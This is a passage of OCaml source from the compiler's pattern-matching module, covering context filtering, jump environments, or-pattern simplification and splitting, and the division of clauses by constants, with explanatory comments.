filter_rec ({l with right=p1::ps}::{l with right=p2::ps}::rem)
| Tpat_alias (p,_,_) ->
filter_rec ({l with right=p::ps}::rem)
| Tpat_var _ ->
filter_rec ({l with right=omega::ps}::rem)
| _ ->
begin let rem = filter_rec rem in
try
let to_left, right = matcher p ps in
{left=to_left::l.left ; right=right}::rem
with
| NoMatch -> rem
end
end
| [] -> []
| _ -> fatal_error "Matching.filter_ctx" in
filter_rec ctx
let select_columns pss ctx =
let n = ncols pss in
List.fold_right
(fun ps r ->
List.fold_right
(fun {left=left ; right=right} r ->
let transfert, right = nchars n right in
try
{left = lubs transfert ps @ left ; right=right}::r
with
| Empty -> r)
ctx r)
pss []
let ctx_lub p ctx =
List.fold_right
(fun {left=left ; right=right} r ->
match right with
| q::rem ->
begin try
{left=left ; right = lub p q::rem}::r
with
| Empty -> r
end
| _ -> fatal_error "Matching.ctx_lub")
ctx []
let ctx_match ctx pss =
List.exists
(fun {right=qs} -> List.exists (fun ps -> may_compats qs ps) pss)
ctx
type jumps = (int * ctx list) list
let pretty_jumps (env : jumps) = match env with
| [] -> ()
| _ ->
List.iter
(fun (i,ctx) ->
Printf.fprintf stderr "jump for %d\n" i ;
pretty_ctx ctx)
env
let rec jumps_extract (i : int) = function
| [] -> [],[]
| (j,pss) as x::rem as all ->
if i=j then pss,rem
else if j < i then [],all
else
let r,rem = jumps_extract i rem in
r,(x::rem)
let rec jumps_remove (i:int) = function
| [] -> []
| (j,_)::rem when i=j -> rem
| x::rem -> x::jumps_remove i rem
let jumps_empty = []
and jumps_is_empty = function
| [] -> true
| _ -> false
let jumps_singleton i = function
| [] -> []
| ctx -> [i,ctx]
let jumps_add i pss jumps = match pss with
| [] -> jumps
| _ ->
let rec add = function
| [] -> [i,pss]
| (j,qss) as x::rem as all ->
if (j:int) > i then x::add rem
else if j < i then (i,pss)::all
else (i,(get_mins le_ctx (pss@qss)))::rem in
add jumps
let rec jumps_union (env1:(int*ctx list)list) env2 = match env1,env2 with
| [],_ -> env2
| _,[] -> env1
| ((i1,pss1) as x1::rem1), ((i2,pss2) as x2::rem2) ->
if i1=i2 then
(i1,get_mins le_ctx (pss1@pss2))::jumps_union rem1 rem2
else if i1 > i2 then
x1::jumps_union rem1 env2
else
x2::jumps_union env1 rem2
let rec merge = function
| env1::env2::rem -> jumps_union env1 env2::merge rem
| envs -> envs
let rec jumps_unions envs = match envs with
| [] -> []
| [env] -> env
| _ -> jumps_unions (merge envs)
let jumps_map f env =
List.map
(fun (i,pss) -> i,f pss)
env
(* Pattern matching before any compilation *)
type pattern_matching =
{ mutable cases : (pattern list * lambda) list;
args : (lambda * let_kind) list ;
default : (matrix * int) list}
(* Pattern matching after application of both the or-pat rule and the
mixture rule *)
type pm_or_compiled =
{body : pattern_matching ;
handlers : (matrix * int * Ident.t list * pattern_matching) list ;
or_matrix : matrix ; }
type pm_half_compiled =
| PmOr of pm_or_compiled
| PmVar of pm_var_compiled
| Pm of pattern_matching
and pm_var_compiled =
{inside : pm_half_compiled ; var_arg : lambda ; }
type pm_half_compiled_info =
{me : pm_half_compiled ;
matrix : matrix ;
top_default : (matrix * int) list ; }
let pretty_cases cases =
List.iter
(fun (ps,_l) ->
List.iter
(fun p ->
Parmatch.top_pretty Format.str_formatter p ;
prerr_string " " ;
prerr_string (Format.flush_str_formatter ()))
ps ;
(*
prerr_string " -> " ;
Printlambda.lambda Format.str_formatter l ;
prerr_string (Format.flush_str_formatter ()) ;
*)
prerr_endline "")
cases
let pretty_def def =
prerr_endline "+++++ Defaults +++++" ;
List.iter
(fun (pss,i) ->
Printf.fprintf stderr "Matrix for %d\n" i ;
pretty_matrix pss)
def ;
prerr_endline "+++++++++++++++++++++"
let pretty_pm pm =
pretty_cases pm.cases ;
if pm.default <> [] then
pretty_def pm.default
let rec pretty_precompiled = function
| Pm pm ->
prerr_endline "++++ PM ++++" ;
pretty_pm pm
| PmVar x ->
prerr_endline "++++ VAR ++++" ;
pretty_precompiled x.inside
| PmOr x ->
prerr_endline "++++ OR ++++" ;
pretty_pm x.body ;
pretty_matrix x.or_matrix ;
List.iter
(fun (_,i,_,pm) ->
eprintf "++ Handler %d ++\n" i ;
pretty_pm pm)
x.handlers
let pretty_precompiled_res first nexts =
pretty_precompiled first ;
List.iter
(fun (e, pmh) ->
eprintf "** DEFAULT %d **\n" e ;
pretty_precompiled pmh)
nexts
(* Identifying some semantically equivalent lambda-expressions.
   Our goal here is also to find alpha-equivalent (simple) terms.

   However, as experience shows, such sharing may hinder the
   lambda-code invariant that all bound idents are unique,
   when switches are compiled to test sequences.
   The definitive fix is the systematic introduction of exit/catch
   in case action sharing is present.
*)
(* Hash-consing store for lambda actions; keys are computed by
   Lambda.make_key so alpha-equivalent simple actions share a slot. *)
module StoreExp =
  Switch.Store
    (struct
      type t = lambda
      type key = lambda
      let compare_key = compare
      let make_key = Lambda.make_key
    end)

(* A bare static exit to handler [i], with no arguments. *)
let make_exit i = Lstaticraise (i,[])

(* Introduce a catch, if worth it *)
(* When [d] is already a plain exit, wrapping it in a fresh catch would
   be useless: the body is built directly around [d]. *)
let make_catch d k = match d with
| Lstaticraise (_,[]) -> k d
| _ ->
    let e = next_raise_count () in
    Lstaticcatch (k (make_exit e),(e,[]),d)

(* Introduce a catch, if worth it, delayed version *)
(* Recognize a lambda that is (possibly under Alias lets) a plain
   argument-less exit, returning its exit number. *)
let rec as_simple_exit = function
  | Lstaticraise (i,[]) -> Some i
  | Llet (Alias,_k,_,_,e) -> as_simple_exit e
  | _ -> None
(* Delayed variant of make_catch: return an exit number together with a
   function that later wraps a body in the corresponding static catch.
   If [handler] already is a simple exit its number is reused and no
   catch is ever produced; if the body turns out to be exactly the exit,
   the handler is substituted directly.
   Fix: the commented-out debug line below had lost its "(*" opener and
   had been duplicated by a bad merge, breaking the syntax — the comment
   delimiters are restored and the duplicate removed. *)
let make_catch_delayed handler = match as_simple_exit handler with
| Some i -> i,(fun act -> act)
| None ->
    let i = next_raise_count () in
(*
    Printf.eprintf "SHARE LAMBDA: %i\n%s\n" i (string_of_lam handler);
*)
    i,
    (fun body -> match body with
    | Lstaticraise (j,_) ->
        if i=j then handler else body
    | _ -> Lstaticcatch (body,(i,[]),handler))
(* Normalize an action through Lambda.make_key when possible,
   otherwise return it unchanged. *)
let raw_action l =
  match make_key l with | Some l -> l | None -> l

(* Same normalization, but failure is signalled by raising Exit. *)
let tr_raw act = match make_key act with
| Some act -> act
| None -> raise Exit

(* If all clauses share the same action (up to make_key normalization),
   return that action; otherwise None. Actions that cannot be
   normalized make the whole test fail (Exit -> None). *)
let same_actions = function
  | [] -> None
  | [_,act] -> Some act
  | (_,act0) :: rem ->
      try
        let raw_act0 = tr_raw act0 in
        let rec s_rec = function
          | [] -> Some act0
          | (_,act)::rem ->
              if raw_act0 = tr_raw act then
                s_rec rem
              else
                None in
        s_rec rem
      with
      | Exit -> None
(* Test for swapping two clauses *)
(* Two actions are interchangeable when their normalized forms are
   equal; actions that make_key cannot normalize never compare equal. *)
let up_ok_action act1 act2 =
  try
    let raw1 = tr_raw act1
    and raw2 = tr_raw act2 in
    raw1 = raw2
  with
  | Exit -> false

(* Clause (ps,act_p) may be moved above the clauses of [l]: for every
   clause of [l] either the actions are interchangeable or the pattern
   rows cannot both match a common value. *)
let up_ok (ps,act_p) l =
  List.for_all
    (fun (qs,act_q) ->
       up_ok_action act_p act_q || not (may_compats ps qs))
    l
(* The simplify function normalizes the first column of the match
     - records are expanded so that they possess all fields
     - aliases are removed and replaced by bindings in actions.
   However or-patterns are simplified differently,
     - aliases are not removed
     - or-patterns (_|p) are changed into _
*)
(* Carries a variable-like pattern out of simpl_rec (see simplify_or):
   an alternative subsumed by a variable collapses its context. *)
exception Var of pattern

(* Simplify an or-pattern (cf. comment above): records are expanded to
   all their fields, aliases are kept, and any sub-pattern that is a
   variable or wildcard propagates upward through the Var exception so
   the enclosing alternative degrades to that variable. *)
let simplify_or p =
  let rec simpl_rec p = match p with
    | {pat_desc = Tpat_any|Tpat_var _} -> raise (Var p)
    | {pat_desc = Tpat_alias (q,id,s)} ->
        begin try
          {p with pat_desc = Tpat_alias (simpl_rec q,id,s)}
        with
        | Var q -> raise (Var {p with pat_desc = Tpat_alias (q,id,s)})
        end
    | {pat_desc = Tpat_or (p1,p2,o)} ->
        (* if p1 degrades to a variable, Var propagates: (x|p) is x *)
        let q1 = simpl_rec p1 in
        begin try
          let q2 = simpl_rec p2 in
          {p with pat_desc = Tpat_or (q1, q2, o)}
        with
        | Var q2 -> raise (Var {p with pat_desc = Tpat_or (q1, q2, o)})
        end
    | {pat_desc = Tpat_record (lbls,closed)} ->
        let all_lbls = all_record_args lbls in
        {p with pat_desc=Tpat_record (all_lbls, closed)}
    | _ -> p in
  try
    simpl_rec p
  with
  | Var p -> p
(* Normalize the first column of the clauses [cls] matched against
   [args]: variables become wildcards plus an Alias binding on the
   first argument, aliases are flattened, empty-record patterns become
   wildcards, record patterns are expanded to all fields, and
   or-patterns are simplified (and re-examined when they degrade to a
   non-or pattern). *)
let simplify_cases args cls = match args with
| [] -> assert false
| (arg,_)::_ ->
    let rec simplify = function
      | [] -> []
      | ((pat :: patl, action) as cl) :: rem ->
          begin match pat.pat_desc with
          | Tpat_var (id, _) ->
              (omega :: patl, bind Alias id arg action) ::
              simplify rem
          | Tpat_any ->
              cl :: simplify rem
          | Tpat_alias(p, id,_) ->
              (* unfold the alias and re-process the exposed pattern *)
              simplify ((p :: patl, bind Alias id arg action) :: rem)
          | Tpat_record ([],_) ->
              (omega :: patl, action)::
              simplify rem
          | Tpat_record (lbls, closed) ->
              let all_lbls = all_record_args lbls in
              let full_pat =
                {pat with pat_desc=Tpat_record (all_lbls, closed)} in
              (full_pat::patl,action)::
              simplify rem
          | Tpat_or _ ->
              let pat_simple = simplify_or pat in
              begin match pat_simple.pat_desc with
              | Tpat_or _ ->
                  (pat_simple :: patl, action) ::
                  simplify rem
              | _ ->
                  (* the or-pattern collapsed; process its new head *)
                  simplify ((pat_simple::patl,action) :: rem)
              end
          | _ -> cl :: simplify rem
          end
      | _ -> assert false in
    simplify cls
(* Once matchings are simplified one can easily find
   their nature *)
(* First non-wildcard head pattern of the clauses, or omega if every
   head is a wildcard. Only valid on simplified matchings. *)
let rec what_is_cases cases = match cases with
| ({pat_desc=Tpat_any} :: _, _) :: rem -> what_is_cases rem
| (({pat_desc=(Tpat_var _|Tpat_or (_,_,_)|Tpat_alias (_,_,_))}::_),_)::_
  -> assert false (* applies to simplified matchings only *)
| (p::_,_)::_ -> p
| [] -> omega
| _ -> assert false
(* A few operations on default environments *)
(* Matrix of a clause list, reduced to its minimal rows (w.r.t. le_pats). *)
let as_matrix cases = get_mins le_pats (List.map (fun (ps,_) -> ps) cases)
(* Push a (matrix, raise_num) entry onto a default environment; an
   empty matrix contributes nothing, so the environment is returned
   unchanged in that case. *)
let cons_default matrix raise_num default =
  if matrix = [] then default
  else (matrix, raise_num) :: default
(* Restrict a default environment to the rows whose head pattern may be
   compatible with [p], dropping that head column; exits whose matrix
   becomes empty disappear from the environment. *)
let default_compat p def =
  List.fold_right
    (fun (pss,i) r ->
       let qss =
         List.fold_right
           (fun qs r -> match qs with
              | q::rem when may_compat p q -> rem::r
              | _ -> r)
           pss [] in
       match qss with
       | [] -> r
       | _ -> (qss,i)::r)
    def []
(* Or-pattern expansion, variables are a complication w.r.t. the article *)
(* Collect every variable bound anywhere inside [p] into the set [r]. *)
let rec extract_vars r p = match p.pat_desc with
| Tpat_var (id, _) -> IdentSet.add id r
| Tpat_alias (p, id,_ ) ->
    extract_vars (IdentSet.add id r) p
| Tpat_tuple pats ->
    List.fold_left extract_vars r pats
| Tpat_record (lpats,_) ->
    List.fold_left
      (fun r (_, _, p) -> extract_vars r p)
      r lpats
| Tpat_construct (_, _, pats) ->
    List.fold_left extract_vars r pats
| Tpat_array pats ->
    List.fold_left extract_vars r pats
| Tpat_variant (_,Some p, _) -> extract_vars r p
| Tpat_lazy p -> extract_vars r p
(* only the left branch is visited: both branches of a well-typed
   or-pattern bind the same variables *)
| Tpat_or (p,_,_) -> extract_vars r p
| Tpat_constant _|Tpat_any|Tpat_variant (_,None,_) -> r
(* Raised when an or-pattern cannot be flattened into plain rows. *)
exception Cannot_flatten

(* Build a renaming for [ids]: identifiers listed in [aliases] are
   mapped to the matched argument itself (which must therefore be a
   known variable), the others get fresh identifiers of the same name. *)
let mk_alpha_env arg aliases ids =
  List.map
    (fun id -> id,
       if List.mem id aliases then
         match arg with
         | Some v -> v
         | _ -> raise Cannot_flatten
       else
         Ident.create (Ident.name id))
    ids
(* Explode an or-pattern into one clause per alternative, prepended to
   [rem]. Bound variables are alpha-renamed via mk_alpha_env and the
   action is rebuilt by [mk_action] applied to the renamed identifiers;
   an alternative that is itself a variable yields a wildcard row. *)
let rec explode_or_pat arg patl mk_action rem vars aliases = function
  | {pat_desc = Tpat_or (p1,p2,_)} ->
      explode_or_pat
        arg patl mk_action
        (explode_or_pat arg patl mk_action rem vars aliases p2)
        vars aliases p1
  | {pat_desc = Tpat_alias (p,id, _)} ->
      explode_or_pat arg patl mk_action rem vars (id::aliases) p
  | {pat_desc = Tpat_var (x, _)} ->
      let env = mk_alpha_env arg (x::aliases) vars in
      (omega::patl,mk_action (List.map snd env))::rem
  | p ->
      let env = mk_alpha_env arg aliases vars in
      (alpha_pat env p::patl,mk_action (List.map snd env))::rem

(* Free variables of all the actions of a matching. *)
let pm_free_variables {cases=cases} =
  List.fold_right
    (fun (_,act) r -> IdentSet.union (free_variables act) r)
    cases IdentSet.empty
(* Basic grouping predicates *)
(* Constructor description of a construct pattern (fatal otherwise). *)
let pat_as_constr = function
  | {pat_desc=Tpat_construct (_, cstr,_)} -> cstr
  | _ -> fatal_error "Matching.pat_as_constr"

(* One predicate per head-pattern family; note that wildcards are
   accepted by the tuple and record families. *)
let group_constant = function
  | {pat_desc= Tpat_constant _} -> true
  | _ -> false
and group_constructor = function
  | {pat_desc = Tpat_construct (_,_,_)} -> true
  | _ -> false
and group_variant = function
  | {pat_desc = Tpat_variant (_, _, _)} -> true
  | _ -> false
and group_var = function
  | {pat_desc=Tpat_any} -> true
  | _ -> false
and group_tuple = function
  | {pat_desc = (Tpat_tuple _|Tpat_any)} -> true
  | _ -> false
and group_record = function
  | {pat_desc = (Tpat_record _|Tpat_any)} -> true
  | _ -> false
and group_array = function
  | {pat_desc=Tpat_array _} -> true
  | _ -> false
and group_lazy = function
  | {pat_desc = Tpat_lazy _} -> true
  | _ -> false
(* Select the grouping predicate matching the family of head [p]. *)
let get_group p = match p.pat_desc with
| Tpat_any -> group_var
| Tpat_constant _ -> group_constant
| Tpat_construct _ -> group_constructor
| Tpat_tuple _ -> group_tuple
| Tpat_record _ -> group_record
| Tpat_array _ -> group_array
| Tpat_variant (_,_,_) -> group_variant
| Tpat_lazy _ -> group_lazy
| _ -> fatal_error "Matching.get_group"

let is_or p = match p.pat_desc with
| Tpat_or _ -> true
| _ -> false

(* Conditions for appending to the Or matrix *)
(* condition (a): the two heads cannot match a common value *)
let conda p q = not (may_compat p q)
(* condition (b): unguarded action and more general remaining row *)
and condb act ps qs = not (is_guarded act) && Parmatch.le_pats qs ps

(* Appending clause (p::ps) after the or-clauses [l] is sound when
   every or-clause of [l] satisfies condition (a) or (b). *)
let or_ok p ps l =
  List.for_all
    (function
      | ({pat_desc=Tpat_or _} as q::qs,act) ->
          conda p q || condb act ps qs
      | _ -> true)
    l
(* Insert or append a pattern in the Or matrix *)
(* Pattern equivalence: mutual instance relation. *)
let equiv_pat p q = le_pat p q && le_pat q p

(* Split [l] into its leading clauses whose head is equivalent to [p],
   and the remaining clauses. *)
let rec get_equiv p l = match l with
  | (q::_,_) as cl::rem ->
      if equiv_pat p q then
        let others,rem = get_equiv p rem in
        cl::others,rem
      else
        [],l
  | _ -> [],l
(* Try to place clause (p::ps, act) into the or-matrix [ors]: it is
   either inserted just before an equivalent variable-free or-pattern,
   appended at the end, or rejected into the no-list [no].
   Returns the updated (ors, no) pair. *)
let insert_or_append p ps act ors no =
  (* [seen] holds the already-inspected or-clauses, in reverse order *)
  let rec attempt seen = function
    | (q::qs,act_q) as cl::rem ->
        if is_or q then begin
          if may_compat p q then
            if
              IdentSet.is_empty (extract_vars IdentSet.empty p) &&
              IdentSet.is_empty (extract_vars IdentSet.empty q) &&
              equiv_pat p q
            then (* attempt insert, for equivalent orpats with no variables *)
              let _, not_e = get_equiv q rem in
              if
                or_ok p ps not_e && (* check append condition for head of O *)
                List.for_all        (* check insert condition for tail of O *)
                  (fun cl -> match cl with
                     | (q::_,_) -> not (may_compat p q)
                     | _ -> assert false)
                  seen
              then (* insert *)
                List.rev_append seen ((p::ps,act)::cl::rem), no
              else (* fail to insert or append *)
                ors,(p::ps,act)::no
            else if condb act_q ps qs then (* check condition (b) for append *)
              attempt (cl::seen) rem
            else
              ors,(p::ps,act)::no
          else (* p # q, go on with append/insert *)
            attempt (cl::seen) rem
        end else (* q is not an or-pat, go on with append/insert *)
          attempt (cl::seen) rem
    | _ -> (* [] in fact *)
        (p::ps,act)::ors,no in (* success in appending *)
  attempt [] ors
(* Reconstruct default information from half_compiled pm list *)
(* Matrix of a half-compiled matching, used to rebuild default info;
   a PmVar node contributes an extra leading wildcard column. *)
let rec rebuild_matrix pmh = match pmh with
  | Pm pm -> as_matrix pm.cases
  | PmOr {or_matrix=m} -> m
  | PmVar x -> add_omega_column (rebuild_matrix x.inside)

(* Re-create a default environment from split continuations, widening
   each continuation's matrix with a leading wildcard column. *)
let rec rebuild_default nexts def = match nexts with
  | [] -> def
  | (e, pmh)::rem ->
      (add_omega_column (rebuild_matrix pmh), e)::
      rebuild_default rem def

(* Wrap every continuation in a PmVar node over [arg], prepending the
   result to [k]. *)
let rebuild_nexts arg nexts k =
  List.fold_right
    (fun (e, pm) k -> (e, PmVar {inside=pm ; var_arg=arg})::k)
    nexts k
(* Split a matching.
   Splitting is first directed by or-patterns, then by
   tests (e.g. constructors)/variable transitions.

   The approach is greedy, every split function attempts to
   raise rows as much as possible in the top matrix,
   then splitting applies again to the remaining rows.

   Some precompilation of or-patterns and
   variable pattern occurs. Mostly this means that bindings
   are performed now, being replaced by let-bindings
   in actions (cf. simplify_cases).
   Additionally, if the match argument is a variable, matchings whose
   first column is made of variables only are split further
   (cf. precompile_var).
*)
(* Phase one of splitting: extract or-pattern clauses. Clauses are
   dispatched into [before] (kept above the or-matrix), [ors] (the
   or-matrix itself) and [no] (pushed below), subject to the
   up_ok/or_ok soundness conditions on clause reordering. *)
let rec split_or argo cls args def =
  let cls = simplify_cases args cls in
  let rec do_split before ors no = function
    | [] ->
        cons_next
          (List.rev before) (List.rev ors) (List.rev no)
    | ((p::ps,act) as cl)::rem ->
        if up_ok cl no then
          if is_or p then
            let ors, no = insert_or_append p ps act ors no in
            do_split before ors no rem
          else begin
            if up_ok cl ors then
              do_split (cl::before) ors no rem
            else if or_ok p ps ors then
              do_split before (cl::ors) no rem
            else
              do_split before ors (cl::no) rem
          end
        else
          do_split before ors (cl::no) rem
    | _ -> assert false
  and cons_next yes yesor = function
    | [] ->
        precompile_or argo yes yesor args def []
    | rem ->
        (* clauses pushed below the or-matrix become a separate
           matching, reached through a fresh exit recorded in the
           default environment *)
        let {me=next ; matrix=matrix ; top_default=def},nexts =
          do_split [] [] [] rem in
        let idef = next_raise_count () in
        precompile_or
          argo yes yesor args
          (cons_default matrix idef def)
          ((idef,next)::nexts) in
  do_split [] [] [] cls
(* Ultra-naive splitting, close to semantics, used for extension,
   as potential rebind prevents any kind of optimisation *)
(* Naive split used for extension constructors: consecutive runs of
   the same constructor stay together, every other transition starts a
   new matching chained through a fresh exit. Rebinding of extension
   constructors forbids any reordering. *)
and split_naive cls args def k =
  (* accumulate clauses whose head is the constructor [cstr0] *)
  let rec split_exc cstr0 yes = function
    | [] ->
        let yes = List.rev yes in
        { me = Pm {cases=yes; args=args; default=def;} ;
          matrix = as_matrix yes ;
          top_default=def},
        k
    | (p::_,_ as cl)::rem ->
        if group_constructor p then
          let cstr = pat_as_constr p in
          if cstr = cstr0 then split_exc cstr0 (cl::yes) rem
          else
            let yes = List.rev yes in
            let {me=next ; matrix=matrix ; top_default=def}, nexts =
              split_exc cstr [cl] rem in
            let idef = next_raise_count () in
            let def = cons_default matrix idef def in
            { me = Pm {cases=yes; args=args; default=def} ;
              matrix = as_matrix yes ;
              top_default = def; },
            (idef,next)::nexts
        else
          let yes = List.rev yes in
          let {me=next ; matrix=matrix ; top_default=def}, nexts =
            split_noexc [cl] rem in
          let idef = next_raise_count () in
          let def = cons_default matrix idef def in
          { me = Pm {cases=yes; args=args; default=def} ;
            matrix = as_matrix yes ;
            top_default = def; },
          (idef,next)::nexts
    | _ -> assert false
  (* accumulate clauses whose head is not a constructor *)
  and split_noexc yes = function
    | [] -> precompile_var args (List.rev yes) def k
    | (p::_,_ as cl)::rem ->
        if group_constructor p then
          let yes= List.rev yes in
          let {me=next; matrix=matrix; top_default=def;},nexts =
            split_exc (pat_as_constr p) [cl] rem in
          let idef = next_raise_count () in
          precompile_var
            args yes
            (cons_default matrix idef def)
            ((idef,next)::nexts)
        else split_noexc (cl::yes) rem
    | _ -> assert false in
  match cls with
  | [] -> assert false
  | (p::_,_ as cl)::rem ->
      if group_constructor p then
        split_exc (pat_as_constr p) [cl] rem
      else
        split_noexc [cl] rem
  | _ -> assert false
(* Phase two of splitting: group clauses by head family. split_ex
   accumulates clauses of the current family, split_noex the others;
   each state switch creates a new matching reached through a fresh
   exit recorded in the default environment. Extension constructors
   are delegated to split_naive. *)
and split_constr cls args def k =
  let ex_pat = what_is_cases cls in
  match ex_pat.pat_desc with
  | Tpat_any -> precompile_var args cls def k
  | Tpat_construct (_,{cstr_tag=Cstr_extension _},_) ->
      split_naive cls args def k
  | _ ->
      let group = get_group ex_pat in
      let rec split_ex yes no = function
        | [] ->
            let yes = List.rev yes and no = List.rev no in
            begin match no with
            | [] ->
                {me = Pm {cases=yes ; args=args ; default=def} ;
                 matrix = as_matrix yes ;
                 top_default = def},
                k
            | cl::rem ->
                begin match yes with
                | [] ->
                    (* Could not success in raising up a constr matching up *)
                    split_noex [cl] [] rem
                | _ ->
                    let {me=next ; matrix=matrix ; top_default=def}, nexts =
                      split_noex [cl] [] rem in
                    let idef = next_raise_count () in
                    let def = cons_default matrix idef def in
                    {me = Pm {cases=yes ; args=args ; default=def} ;
                     matrix = as_matrix yes ;
                     top_default = def },
                    (idef, next)::nexts
                end
            end
        | (p::_,_) as cl::rem ->
            if group p && up_ok cl no then
              split_ex (cl::yes) no rem
            else
              split_ex yes (cl::no) rem
        | _ -> assert false
      and split_noex yes no = function
        | [] ->
            let yes = List.rev yes and no = List.rev no in
            begin match no with
            | [] -> precompile_var args yes def k
            | cl::rem ->
                let {me=next ; matrix=matrix ; top_default=def}, nexts =
                  split_ex [cl] [] rem in
                let idef = next_raise_count () in
                precompile_var
                  args yes
                  (cons_default matrix idef def)
                  ((idef,next)::nexts)
            end
        | [ps,_ as cl]
          when List.for_all group_var ps && yes <> [] ->
            (* This enables an extra division in some frequent cases :
               last row is made of variables only *)
            split_noex yes (cl::no) []
        | (p::_,_) as cl::rem ->
            if not (group p) && up_ok cl no then
              split_noex (cl::yes) no rem
            else
              split_noex yes (cl::no) rem
        | _ -> assert false in
      match cls with
      | ((p::_,_) as cl)::rem ->
          if group p then split_ex [cl] [] rem
          else split_noex [cl] [] rem
      | _ -> assert false
(* When the first argument is followed by a variable argument (Lvar),
   split matchings whose first column is all-variables further: the
   variable column is pushed inside a PmVar node and splitting restarts
   on the shortened rows. Falls back to a plain Pm node otherwise. *)
and precompile_var args cls def k = match args with
| [] -> assert false
| _::((Lvar v as av,_) as arg)::rargs ->
    begin match cls with
    | [_] -> (* as splitted as it can *)
        dont_precompile_var args cls def k
    | _ ->
        (* Precompile *)
        let var_cls =
          List.map
            (fun (ps,act) -> match ps with
               | _::ps -> ps,act | _ -> assert false)
            cls
        and var_def = make_default (fun _ rem -> rem) def in
        let {me=first ; matrix=matrix}, nexts =
          split_or (Some v) var_cls (arg::rargs) var_def in
        (* Compute top information *)
        match nexts with
        | [] -> (* If you need *)
            dont_precompile_var args cls def k
        | _ ->
            let rfirst =
              {me = PmVar {inside=first ; var_arg = av} ;
               matrix = add_omega_column matrix ;
               top_default = rebuild_default nexts def ; }
            and rnexts = rebuild_nexts av nexts k in
            rfirst, rnexts
    end
| _ ->
    dont_precompile_var args cls def k

(* Fallback: keep the matching as-is inside a plain Pm node. *)
and dont_precompile_var args cls def k =
  {me = Pm {cases = cls ; args = args ; default = def } ;
   matrix=as_matrix cls ;
   top_default=def},k
(* Phase three: compile the or-matrix [ors]. Each group of equivalent
   or-patterns becomes a handler reached by a fresh static exit; the
   or-pattern itself is exploded into one clause per alternative whose
   action raises that exit with the bound variables as arguments. *)
and precompile_or argo cls ors args def k = match ors with
| [] -> split_constr cls args def k
| _ ->
    let rec do_cases = function
      | ({pat_desc=Tpat_or _} as orp::patl, action)::rem ->
          let others,rem = get_equiv orp rem in
          (* sub-matching made of the rows whose head was equivalent
             to [orp], with that head column removed *)
          let orpm =
            {cases =
               (patl, action)::
               List.map
                 (function
                   | (_::ps,action) -> ps,action
                   | _ -> assert false)
                 others ;
             args = (match args with _::r -> r | _ -> assert false) ;
             default = default_compat orp def} in
          (* only variables actually used by the handler's actions need
             to be passed through the exit *)
          let vars =
            IdentSet.elements
              (IdentSet.inter
                 (extract_vars IdentSet.empty orp)
                 (pm_free_variables orpm)) in
          let or_num = next_raise_count () in
          let new_patl = Parmatch.omega_list patl in
          let mk_new_action vs =
            Lstaticraise
              (or_num, List.map (fun v -> Lvar v) vs) in
          let body,handlers = do_cases rem in
          explode_or_pat
            argo new_patl mk_new_action body vars [] orp,
          let mat = [[orp]] in
          ((mat, or_num, vars , orpm):: handlers)
      | cl::rem ->
          let new_ord,new_to_catch = do_cases rem in
          cl::new_ord,new_to_catch
      | [] -> [],[] in
    let end_body, handlers = do_cases ors in
    let matrix = as_matrix (cls@ors)
    and body = {cases=cls@end_body ; args=args ; default=def} in
    {me = PmOr {body=body ; handlers=handlers ; or_matrix=matrix} ;
     matrix=matrix ;
     top_default=def},
    k
(* Entry point of splitting. Traces the result on stderr when the dbg
   flag is set and splitting actually changed something (continuations
   were produced, or an or-compiled node was built). *)
let split_precompile argo pm =
  let {me=next}, nexts = split_or argo pm.cases pm.args pm.default in
  if dbg && (nexts <> [] || (match next with PmOr _ -> true | _ -> false))
  then begin
    prerr_endline "** SPLIT **" ;
    pretty_pm pm ;
    pretty_precompiled_res next nexts
  end ;
  next, nexts
(* General divide functions *)
(* Prepend a clause to a matching, mutating it in place. *)
let add_line patl_action pm = pm.cases <- patl_action :: pm.cases; pm

(* A sub-matching together with its context and the (normalized)
   pattern that selects it. *)
type cell =
  {pm : pattern_matching ;
   ctx : ctx list ;
   pat : pattern}

(* Add a clause to the division entry for [key], creating the entry
   with [make_matching_fun] on first use. Cells are mutated in place. *)
let add make_matching_fun division eq_key key patl_action args =
  try
    let (_,cell) = List.find (fun (k,_) -> eq_key key k) division in
    cell.pm.cases <- patl_action :: cell.pm.cases;
    division
  with Not_found ->
    let cell = make_matching_fun args in
    cell.pm.cases <- [patl_action] ;
    (key, cell) :: division

(* Divide the clauses of [pm] into one sub-matching per head key.
   Clauses are processed back-to-front so each cell's clauses end up in
   source order. *)
let divide make eq_key get_key get_args ctx pm =
  let rec divide_rec = function
    | (p::patl,action) :: rem ->
        let this_match = divide_rec rem in
        add
          (make p pm.default ctx)
          this_match eq_key (get_key p) (get_args p patl,action) pm.args
    | _ -> [] in
  divide_rec pm.cases

(* Divide for single-group heads (variables, tuples, records, lazy):
   every clause lands in the same sub-matching. *)
let divide_line make_ctx make get_args pat ctx pm =
  let rec divide_rec = function
    | (p::patl,action) :: rem ->
        let this_match = divide_rec rem in
        add_line (get_args p patl, action) this_match
    | _ -> make pm.default pm.args in
  {pm = divide_rec pm.cases ;
   ctx=make_ctx ctx ;
   pat=pat}
(* Then come various functions.
   There is one set of functions per matching style
   (constants, constructors etc.)

   - matcher functions are arguments to make_default (for default handlers).
     They may raise NoMatch or OrPat and perform the full
     matching (selection + arguments).

   - get_args and get_key are for the compiled matrices, note that
     selection and getting arguments are separated.

   - make_*_matching combines the previous functions for producing
     new ``pattern_matching'' records.
*)
(* Default-matrix matcher for constant [cst]: keeps rows whose head is
   that constant or a wildcard, tries both branches of an or-pattern,
   and raises NoMatch otherwise. *)
let rec matcher_const cst p rem = match p.pat_desc with
| Tpat_or (p1,p2,_) ->
    begin try
      matcher_const cst p1 rem with
    | NoMatch -> matcher_const cst p2 rem
    end
| Tpat_constant c1 when const_compare c1 cst = 0 -> rem
| Tpat_any -> rem
| _ -> raise NoMatch

(* Constant carried by a constant pattern; [caller] tags the failure
   diagnostic printed before the assertion fires. *)
let get_key_constant caller = function
  | {pat_desc= Tpat_constant cst} -> cst
  | p ->
      prerr_endline ("BAD: "^caller) ;
      pretty_pat p ;
      assert false

(* Constants carry no sub-patterns. *)
let get_args_constant _ rem = rem

(* Empty sub-matching for one constant value: the matched argument is
   dropped, the default matrix and the context are narrowed. *)
let make_constant_matching p def ctx = function
    [] -> fatal_error "Matching.make_constant_matching"
  | (_ :: argl) ->
      let def =
        make_default
          (matcher_const (get_key_constant "make" p)) def
      and ctx =
        filter_ctx p ctx in
      {pm = {cases = []; args = argl ; default = def} ;
       ctx = ctx ;
       pat = normalize_pat p}

(* Divide a matching whose heads are constants, one cell per value. *)
let divide_constant ctx m =
  divide
    make_constant_matching
    (fun c d -> const_compare c d = 0) (get_key_constant "divide")
    get_args_constant
